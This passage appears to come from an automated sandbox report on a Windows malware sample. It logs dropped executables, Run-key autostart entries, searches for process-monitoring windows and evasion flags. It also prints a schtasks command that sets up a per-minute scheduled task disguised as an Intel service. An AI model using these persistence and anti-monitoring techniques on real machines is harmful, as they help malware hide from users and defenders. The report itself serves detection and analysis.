Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9434b989db.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9434b989db.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9434b989db.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

